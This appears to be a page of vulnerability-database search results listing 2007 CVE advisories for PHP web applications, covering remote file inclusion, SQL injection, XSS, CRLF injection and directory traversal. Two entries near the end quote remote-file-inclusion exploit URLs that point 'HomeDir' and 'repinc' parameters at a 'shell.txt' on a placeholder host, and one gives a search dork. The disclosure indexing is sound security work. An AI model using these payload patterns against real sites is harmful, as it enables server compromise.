Lucene search
K

7210 matches found

Prion
Prion
added 2007/05/11 4:19 p.m.11 views

Crlf injection

CRLF injection vulnerability in index.php in Drake CMS 0.4.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the lang parameter. NOTE: Drake CMS has only a beta version available, and the vendor has previously stated "We d...

5.1CVSS7.5AI score0.0119EPSS
Exploits0References5Affected Software1
CVE
CVE
added 2007/05/11 4:0 p.m.44 views

CVE-2007-2618

The CVE-2007-2618 issue affects Drake CMS 0.4.0, identifying a CRLF injection vulnerability in index.php. The root cause is a CRLF sequence in the lang parameter that enables an attacker to inject arbitrary HTTP headers and perform HTTP response splitting. Public details describe the vulnerable c...

5.1CVSS7AI score0.0119EPSS
Exploits0References5Affected Software1
Prion
Prion
added 2007/05/11 10:19 a.m.11 views

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in gnuedu 1.3b2 allow remote attackers to execute arbitrary PHP code via a URL in the a ETCDIR parameter to 1 libs/lom.php; 2 lomupdate.php, 3 check-lom.php, and 4 weighkeywords.php in scripts/; the b LIBSDIR parameter to 5 logout.php, 6 help.php...

7.5CVSS8.2AI score0.09676EPSS
Exploits0References13Affected Software1
CVE
CVE
added 2007/05/11 10:0 a.m.53 views

CVE-2007-2609

CVE-2007-2609 affects gnuedu 1.3b2 with multiple PHP remote file inclusion vulnerabilities . An attacker can trigger arbitrary PHP code execution by supplying untrusted values to the ETCDIR parameter for files/libs (libs/lom.php; lom_update.php; check-lom.php; weigh_keywords.php; web/lom.php) and...

7.5CVSS7.7AI score0.09676EPSS
Exploits0References13Affected Software1
Prion
Prion
added 2007/05/09 9:19 p.m.12 views

Sql injection

SQL injection vulnerability in index.php in the wfquotes 1.0 0 module for XOOPS allows remote attackers to execute arbitrary SQL commands via the c parameter in a cat action...

7.5CVSS9.1AI score0.01003EPSS
Exploits1References5Affected Software1
CVE
CVE
added 2007/05/09 9:0 p.m.45 views

CVE-2007-2574

The CVE-2007-2574 entry describes a directory traversal vulnerability in Archangel Weblog 0.90.02, where an attacker can read arbitrary files by supplying a .. (dot dot) path in the index parameter of index.php. This is caused by improper validation of the index parameter, enabling access to file...

5CVSS6.7AI score0.0243EPSS
Exploits0References2Affected Software1
NVD
NVD
added 2007/05/09 6:19 p.m.13 views

CVE-2007-2562

Cross-site scripting XSS vulnerability in index.php in Kayako eSupport 3.00.90 allows remote attackers to inject arbitrary web script or HTML via the m parameter...

4.3CVSS5.7AI score0.01028EPSS
Exploits0References4
Prion
Prion
added 2007/05/09 6:19 p.m.16 views

Remote file inclusion

PHP remote file inclusion vulnerability in index.php in phpFullAnnu CMS pfa CMS 6.0 allows remote attackers to execute arbitrary PHP code via a URL in the repinc parameter. NOTE: CVE disputes this issue since $repinc is set to a constant value before use...

7.5CVSS7.8AI score0.01548EPSS
Exploits0References5Affected Software1
CVE
CVE
added 2007/05/09 6:0 p.m.41 views

CVE-2007-2562

Vulnerability summary (CVE-2007-2562) : Kayako eSupport 3.00.90 is affected by a cross-site scripting (XSS) flaw in index.php, exploitable via the _m parameter. The underlying issue is unsanitized input passed through this parameter, allowing remote attackers to inject arbitrary web script or HTM...

4.3CVSS5.7AI score0.01028EPSS
Exploits0References4Affected Software1
Cvelist
Cvelist
added 2007/05/09 6:0 p.m.20 views

CVE-2007-2562

Cross-site scripting XSS vulnerability in index.php in Kayako eSupport 3.00.90 allows remote attackers to inject arbitrary web script or HTML via the m parameter...

5.7AI score0.01028EPSS
Exploits0References4
CVE
CVE
added 2007/05/09 6:0 p.m.44 views

CVE-2007-2558

CVE-2007-2558 concerns a PHP remote file inclusion in the web app pfa CMS (phpFullAnnu CMS) version 6.0, specifically in index.php via the repinc parameter. The vulnerability is described as enabling remote PHP code execution through a URL if repinc is used to include code. However, the CVE notes...

7.5CVSS7.5AI score0.01548EPSS
Exploits0References5Affected Software1
Prion
Prion
added 2007/05/09 5:19 p.m.664 views

Directory traversal

Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. dot dot in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...

5.1CVSS7.4AI score0.07506EPSS
Exploits2References9Affected Software1
Cvelist
Cvelist
added 2007/05/09 5:0 p.m.32 views

CVE-2007-0609

Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. dot dot in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...

7.1AI score0.07506EPSS
Exploits2References9
NVD
NVD
added 2007/05/09 10:19 a.m.18 views

CVE-2007-2548

Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and an l remote attack vector, related to "Cookie Manipulation."...

6.4CVSS6.7AI score0.0101EPSS
Exploits0References4
CVE
CVE
added 2007/05/09 10:0 a.m.46 views

CVE-2007-2548

Summary: CVE-2007-2548 concerns TurnkeyWebTools SunShop Shopping Cart 4.0 with an issue in index.php described as a vulnerability tied to cookie manipulation and a remote attack vector . The exact impact is listed as unknown in the description. The available data indicate a remote, low-complexity...

6.4CVSS6.7AI score0.0101EPSS
Exploits0References4Affected Software1
Cvelist
Cvelist
added 2007/05/09 10:0 a.m.19 views

CVE-2007-2548

Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and an l remote attack vector, related to "Cookie Manipulation."...

6.7AI score0.0101EPSS
Exploits0References4
CVE
CVE
added 2007/05/09 10:0 a.m.45 views

CVE-2007-2549

CVE-2007-2549 affects TurnKeyWebTools SunShop Shopping Cart 4.0. SQL injection in index.php via the (1) c or (2) quantity parameter allows remote attackers to execute arbitrary SQL commands. Root cause is unsanitized input in index.php that enables SQL commands to reach the database. The connecte...

7.5CVSS8.2AI score0.01195EPSS
Exploits1References6Affected Software1
CVE
CVE
added 2007/05/08 11:0 p.m.58 views

CVE-2007-2527

The CVE affects DynamicPAD prior to version 1.03.31. It exposes multiple PHP remote file inclusion vulnerabilities that allow an attacker to execute arbitrary PHP code by supplying a crafted URL in the HomeDir parameter to either dp_logs.php or index.php. The underlying issue is a remote file inc...

7.5CVSS7.7AI score0.03642EPSS
Exploits0References8Affected Software1
seebug.org
seebug.org
added 2007/05/08 12:0 a.m.39 views

DynamicPAD <= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities

No description provided by source. DynamicPAD Remote file inclusion HomeDir Download script : http://dynamicpad.org/dp.tar.gz Thanks Str0ke Dork : "Powered By DynamicPAD" Exploit : http://victim.com/dppath/dplogs.php?HomeDir=shell.txt? http://victom.com/dppath/index.php?HomeDir= shell.txt?...

7.1AI score
Exploits0
Packet Storm
Packet Storm
added 2007/05/08 12:0 a.m.103 views

pfacms-rfi.txt

pfa CMS v6.0 // AYYILDIZ.ORG Gururla Sunar ! = OZELHAREKAT Author: iLker Kandemir ScriptSite: http://pfa.netsliver.com/downloadpfa Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke Exploit: http://site/pfapath/index.php?repinc=http://shell.txt?...

7.4AI score
Exploits0
Rows per page
Query Builder